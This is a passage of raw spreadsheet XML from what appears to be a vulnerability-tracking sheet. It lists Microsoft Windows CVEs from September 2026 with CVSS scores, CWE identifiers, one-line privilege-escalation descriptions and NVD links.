t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G531" s="5" t="inlineStr" /><c r="H531" s="5" t="n"><v>0.003</v></c><c r="I531" s="5" t="inlineStr" /><c r="J531" s="5" t="inlineStr" /><c r="K531" s="5" t="inlineStr" /><c r="L531" s="5" t="inlineStr" /><c r="M531" s="5" t="inlineStr" /><c r="N531" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O531" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P531" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q531" s="5" t="inlineStr" /><c r="R531" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="S531" s="5" t="inlineStr"><is><t>Missing authentication for critical function in Windows Shell allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T531" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69528</t></is></c></row><row r="532"><c r="A532" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B532" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C532" s="5" t="inlineStr"><is><t>CVE-2026-69532</t></is></c><c r="D532" s="5" t="n"><v>7.8</v></c><c r="E532" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F532" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G532" s="5" t="inlineStr" /><c r="H532" s="5" t="n"><v>0.003</v></c><c r="I532" s="5" t="inlineStr" /><c r="J532" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K53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32" s="5" t="inlineStr" /><c r="M532" s="5" t="inlineStr" /><c r="N532" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O532" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P532" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q532" s="5" t="inlineStr" /><c r="R532" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S532" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows NTFS allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T532" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69532</t></is></c></row><row r="533"><c r="A533" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B533" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C533" s="5" t="inlineStr"><is><t>CVE-2026-69534</t></is></c><c r="D533" s="5" t="n"><v>7.8</v></c><c r="E533" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F533" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G533" s="5" t="inlineStr" /><c r="H533" s="5" t="n"><v>0.006</v></c><c r="I533" s="5" t="inlineStr" /><c r="J533" s="5" t="inlineStr" /><c r="K533" s="5" t="inlineStr" /><c r="L533" s="5" t="inlineStr" /><c r="M533" s="5" t="inlineStr" /><c r="N533" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O533" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P533" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q533" s="5" t="inlineStr" /><c r="R533" s="5" t="inlineStr"><is><t>CWE-77</t></is></c><c r="S533" s="5" t="inlineStr"><is><t>Improper neutralization of special elements used in a command ('command injection') in Windows Program Compatibility Assistant Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T533" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69534</t></is></c></row><row r="534"><c r="A534" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B534" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C534" s="5" t="inlineStr"><is><t>CVE-2026-69535</t></is></c><c r="D534" s="5" t="n"><v>7.8</v></c><c r="E534" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F534" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G534" s="5" t="inlineStr" /><c r="H534" s="5" t="n"><v>0.002</v></c><c r="I534" s="5" t="inlineStr" /><c r="J534" s="5" t="inlineStr" /><c r="K534" s="5" t="inlineStr" /><c r="L534" s="5" t="inlineStr" /><c r="M534" s="5" t="inlineStr" /><c r="N534" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O534" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P534" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q534" s="5" t="inlineStr" /><c r="R534" s="5" t="inlineStr"><is><t>CWE-122, CWE-197</t></is></c><c r="S534" s="5" t="inlineStr"><is><t>Numeric truncation error in Windows Spaceport.sys allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T534" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69535</t></is></c></row><row r="535"><c r="A535" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B535" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C535" s="5" t="inlineStr"><is><t>CVE-2026-69538</t></is></c><c r="D535" s="5" t="n"><v>7.8</v></c><c r="E535" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F535" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G535" s="5" t="inlineStr" /><c r="H535" s="5" t="n"><v>0.002</v></c><c r="I535" s="5" t="inlineStr" /><c r="J535" s="5" t="inlineStr" /><c r="K535" s="5" t="inlineStr" /><c r="L535" s="5" t="inlineStr" /><c r="M535" s="5" t="inlineStr" /><c r="N535" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O535" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P535" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q535" s="5" t="inlineStr" /><c r="R535" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S535" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Spaceport.sys allows an authorized attacker to execute code locally.</t></is></c><c r="T535" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69538</t></is></c></row><row r="536"><c r="A536" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B536" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C536" s="5" t="inlineStr"><is><t>CVE-2026-69541</t></is></c><c r="D536" s="5" t="n"><v>7.8</v></c><c r="E536" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F536" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G536" s="5" t="inlineStr" /><c r="H536" s="5" t="n"><v>0.003</v></c><c r="I536" s="5" t="inlineStr" /><c r="J536" s="5" t="inlineStr" /><c r="K536" s="5" t="inlineStr" /><c r="L536" s="5" t="inlineStr" /><c r="M536" s="5" t="inlineStr" /><c r="N536" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O536" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P536" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q536" s="5" t="inlineStr" /><c r="R536" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S536" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Virtual Hard Disk (VHD) Miniport Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T536" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69541</t></is></c></row><row r="537"><c r="A537" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B537" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C537" s="5" t="inlineStr"><is><t>CVE-2026-69542</t></is></c><c r="D537" s="5" t="n"><v>7.8</v></c><c r="E537" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F537" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G537" s="5" t="inlineStr" /><c r="H537" s="5" t="n"><v>0.002</v></c><c r="I537" s="5" t="inlineStr" /><c r="J537" s="5" t="inlineStr" /><c r="K537" s="5" t="inlineStr" /><c r="L537" s="5" t="inlineStr" /><c r="M537" s="5" t="inlineStr" /><c r="N537" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O537" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P537" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q537" s="5" t="inlineStr" /><c r="R537" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S537" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Camera Frame Server Monitor allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T537" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69542</t></is></c></row><row r="538"><c r="A538" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B538" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C538" s="5" t="inlineStr"><is><t>CVE-2026-69544</t></is></c><c r="D538" s="5" t="n"><v>7.8</v></c><c r="E538" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F538" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G538" s="5" t="inlineStr" /><c r="H538" s="5" t="n"><v>0.003</v></c><c r="I538" s="5" t="inlineStr" /><c r="J538" s="5" t="inlineStr" /><c r="K538" s="5" t="inlineStr" /><c r="L538" s="5" t="inlineStr" /><c r="M538" s="5" t="inlineStr" /><c r="N538" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O538" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P538" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q538" s="5" t="inlineStr" /><c r="R538" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S538" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows SMB Client allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T538" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69544</t></is></c></row><row r="539"><c r="A539" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B539" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C539" s="5" t="inlineStr"><is><t>CVE-2026-69561</t></is></c><c r="D539" s="5" t="n"><v>7.8</v></c><c r="E539" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F539" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G539" s="5" t="inlineStr" /><c r="H539" s="5" t="n"><v>0.003</v></c><c r="I539" s="5" t="inlineStr" /><c r="J539" s="5" t="inlineStr" /><c r="K539" s="5" t="inlineStr" /><c r="L539" s="5" t="inlineStr" /><c r="M539" s="5" t="inlineStr" /><c r="N539" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O539" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P539" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q539" s="5" t="inlineStr" /><c r="R539" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S539" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows CD-ROM Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T539" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69561</t></is></c></row><row r="540"><c r="A540" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B540" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C540" s="5" t="inlineStr"><is><t>CVE-2026-69571</t></is></c><c r="D540" s="5" t="n"><v>7.8</v></c><c r="E540" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F540" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G540" s="5" t="inlineStr" /><c r="H540" s="5" t="n"><v>0.003</v></c><c r="I540" s="5" t="inlineStr" /><c r="J540" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K54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40" s="5" t="inlineStr" /><c r="M540" s="5" t="inlineStr" /><c r="N540" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O540" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P540" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q540" s="5" t="inlineStr" /><c r="R540" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S540" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T540" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69571</t></is></c></row><row r="541"><c r="A541" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B541" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C541" s="5" t="inlineStr"><is><t>CVE-2026-69576</t></is></c><c r="D541" s="5" t="n"><v>7.8</v></c><c r="E541" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F541" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G541" s="5" t="inlineStr" /><c r="H541" s="5" t="n"><v>0.003</v></c><c r="I541" s="5" t="inlineStr" /><c r="J541" s="5" t="inlineStr" /><c r="K541" s="5" t="inlineStr" /><c r="L541" s="5" t="inlineStr" /><c r="M541" s="5" t="inlineStr" /><c r="N541" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O541" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P541" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q541" s="5" t="inlineStr" /><c r="R541" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S541" s="5" t="inlineStr"><is><t>Use after free in Graphic Fonts allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T541" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69576</t></is></c></row><row r="542"><c r="A542" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B542" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C542" s="5" t="inlineStr"><is><t>CVE-2026-69580</t></is></c><c r="D542" s="5" t="n"><v>7.8</v></c><c r="E542" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F542" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G542" s="5" t="inlineStr" /><c r="H542" s="5" t="n"><v>0.003</v></c><c r="I542" s="5" t="inlineStr" /><c r="J542" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K54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2" s="5" t="inlineStr" /><c r="M542" s="5" t="inlineStr" /><c r="N542" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O542" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P542" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q542" s="5" t="inlineStr" /><c r="R542" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S542" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T542" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69580</t></is></c></row><row r="543"><c r="A543" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B543" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C543" s="5" t="inlineStr"><is><t>CVE-2026-69582</t></is></c><c r="D543" s="5" t="n"><v>7.8</v></c><c r="E543" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F543" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G543" s="5" t="inlineStr" /><c r="H543" s="5" t="n"><v>0.003</v></c><c r="I543" s="5" t="inlineStr" /><c r="J543" s="5" t="inlineStr" /><c r="K543" s="5" t="inlineStr" /><c r="L543" s="5" t="inlineStr" /><c r="M543" s="5" t="inlineStr" /><c r="N543" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O543" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P543" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q543" s="5" t="inlineStr" /><c r="R543" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="S543" s="5" t="inlineStr"><is><t>Buffer over-read in Windows Volume Manager Extension Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T543" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69582</t></is></c></row><row r="544"><c r="A544" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B544" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C544" s="5" t="inlineStr"><is><t>CVE-2026-69583</t></is></c><c r="D544" s="5" t="n"><v>7.8</v></c><c r="E544" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F544" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G544" s="5" t="inlineStr" /><c r="H544" s="5" t="n"><v>0.003</v></c><c r="I544" s="5" t="inlineStr" /><c r="J544" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K54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4" s="5" t="inlineStr" /><c r="M544" s="5" t="inlineStr" /><c r="N544" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O544" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P544" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q544" s="5" t="inlineStr" /><c r="R544" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S544" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T544" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69583</t></is></c></row><row r="545"><c r="A545" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B545" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C545" s="5" t="inlineStr"><is><t>CVE-2026-69584</t></is></c><c r="D545" s="5" t="n"><v>7.8</v></c><c r="E545" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F545" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G545" s="5" t="inlineStr" /><c r="H545" s="5" t="n"><v>0.003</v></c><c r="I545" s="5" t="inlineStr" /><c r="J545" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K54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45" s="5" t="inlineStr" /><c r="M545" s="5" t="inlineStr" /><c r="N545" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O545" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P545" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q545" s="5" t="inlineStr" /><c r="R545" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S545" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Windows USB Video Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T545" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69584</t></is></c></row><row r="546"><c r="A546" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B546" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C546" s="5" t="inlineStr"><is><t>CVE-2026-69585</t></is></c><c r="D546" s="5" t="n"><v>7.8</v></c><c r="E546" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F546" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G546" s="5" t="inlineStr" /><c r="H546" s="5" t="n"><v>0.004</v></c><c r="I546" s="5" t="inlineStr" /><c r="J546" s="5" t="inlineStr" /><c r="K546" s="5" t="inlineStr" /><c r="L546" s="5" t="inlineStr" /><c r="M546" s="5" t="inlineStr" /><c r="N546" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O546" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P546" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q546" s="5" t="inlineStr" /><c r="R546" s="5" t="inlineStr"><is><t>CWE-704</t></is></c><c r="S546" s="5" t="inlineStr"><is><t>Incorrect type conversion or cast in Microsoft Windows Search Component allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T546" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69585</t></is></c></row><row r="547"><c r="A547" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B547" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C547" s="5" t="inlineStr"><is><t>CVE-2026-69589</t></is></c><c r="D547" s="5" t="n"><v>7.8</v></c><c r="E547" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F547" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G547" s="5" t="inlineStr" /><c r="H547" s="5" t="n"><v>0.003</v></c><c r="I547" s="5" t="inlineStr" /><c r="J547" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K54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7" s="5" t="inlineStr" /><c r="M547" s="5" t="inlineStr" /><c r="N547" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O547" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P547" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q547" s="5" t="inlineStr" /><c r="R547" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S547" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T547" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69589</t></is></c></row><row r="548"><c r="A548" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B548" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C548" s="5" t="inlineStr"><is><t>CVE-2026-69592</t></is></c><c r="D548" s="5" t="n"><v>7.8</v></c><c r="E548" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F548" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G548" s="5" t="inlineStr" /><c r="H548" s="5" t="n"><v>0.003</v></c><c r="I548" s="5" t="inlineStr" /><c r="J548" s="5" t="inlineStr" /><c r="K548" s="5" t="inlineStr" /><c r="L548" s="5" t="inlineStr" /><c r="M548" s="5" t="inlineStr" /><c r="N548" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O548" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P548" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q548" s="5" t="inlineStr" /><c r="R548" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S548" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Universal Disk Format File System Driver (UDFS) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T548" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69592</t></is></c></row><row r="549"><c r="A549" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B549" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C549" s="5" t="inlineStr"><is><t>CVE-2026-69593</t></is></c><c r="D549" s="5" t="n"><v>7.8</v></c><c r="E549" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F549" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G549" s="5" t="inlineStr" /><c r="H549" s="5" t="n"><v>0.003</v></c><c r="I549" s="5" t="inlineStr" /><c r="J549" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K54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49" s="5" t="inlineStr" /><c r="M549" s="5" t="inlineStr" /><c r="N549" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O549" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P549" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q549" s="5" t="inlineStr" /><c r="R549" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S549" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T549" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69593</t></is></c></row><row r="550"><c r="A550" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B550" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C550" s="5" t="inlineStr"><is><t>CVE-2026-69594</t></is></c><c r="D550" s="5" t="n"><v>7.8</v></c><c r="E550" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F550" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G550" s="5" t="inlineStr" /><c r="H550" s="5" t="n"><v>0.003</v></c><c r="I550" s="5" t="inlineStr" /><c r="J550" s="5" t="inlineStr" /><c r="K550" s="5" t="inlineStr" /><c r="L550" s="5" t="inlineStr" /><c r="M550" s="5" t="inlineStr" /><c r="N550" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O550" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P550" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q550" s="5" t="inlineStr" /><c r="R550" s="5" t="inlineStr"><is><t>CWE-122, CWE-190</t></is></c><c r="S550" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Local Security Authority Server (lsasrv) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T550" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69594</t></is></c></row><row r="551"><c r="A551" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B551" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C551" s="5" t="inlineStr"><is><t>CVE-2026-69604</t></is></c><c r="D551" s="5" t="n"><v>7.8</v></c><c r="E551" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F551" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G551" s="5" t="inlineStr" /><c r="H551" s="5" t="n"><v>0.003</v></c><c r="I551" s="5" t="inlineStr" /><c r="J551" s="5" t="inlineStr" /><c r="K551" s="5" t="inlineStr" /><c r="L551" s="5" t="inlineStr" /><c r="M551" s="5" t="inlineStr" /><c r="N551" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O551" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P551" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q551" s="5" t="inlineStr" /><c r="R551" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S551" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T551" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69604</t></is></c></row><row r="552"><c r="A552" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B552" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C552" s="5" t="inlineStr"><is><t>CVE-2026-69608</t></is></c><c r="D552" s="5" t="n"><v>7.8</v></c><c r="E552" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F552" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G552" s="5" t="inlineStr" /><c r="H552" s="5" t="n"><v>0.003</v></c><c r="I552" s="5" t="inlineStr" /><c r="J552" s="5" t="inlineStr" /><c r="K552" s="5" t="inlineStr" /><c r="L552" s="5" t="inlineStr" /><c r="M552" s="5" t="inlineStr" /><c r="N552" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O552" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P552" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q552" s="5" t="inlineStr" /><c r="R552" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S552" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Microsoft Windows Search Component allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T552" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69608</t></is></c></row><row r="553"><c r="A553" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B553" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C553" s="5" t="inlineStr"><is><t>CVE-2026-69612</t></is></c><c r="D553" s="5" t="n"><v>7.8</v></c><c r="E553" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F553" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G553" s="5" t="inlineStr" /><c r="H553" s="5" t="n"><v>0.004</v></c><c r="I553" s="5" t="inlineStr" /><c r="J553" s="5" t="inlineStr" /><c r="K553" s="5" t="inlineStr" /><c r="L553" s="5" t="inlineStr" /><c r="M553" s="5" t="inlineStr" /><c r="N553" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O553" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P553" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q553" s="5" t="inlineStr" /><c r="R553" s="5" t="inlineStr"><is><t>CWE-36</t></is></c><c r="S553" s="5" t="inlineStr"><is><t>Absolute path traversal in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T553" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69612</t></is></c></row><row r="554"><c r="A554" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B554" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C554" s="5" t="inlineStr"><is><t>CVE-2026-69685</t></is></c><c r="D554" s="5" t="n"><v>7.8</v></c><c r="E554" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F554" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G554" s="5" 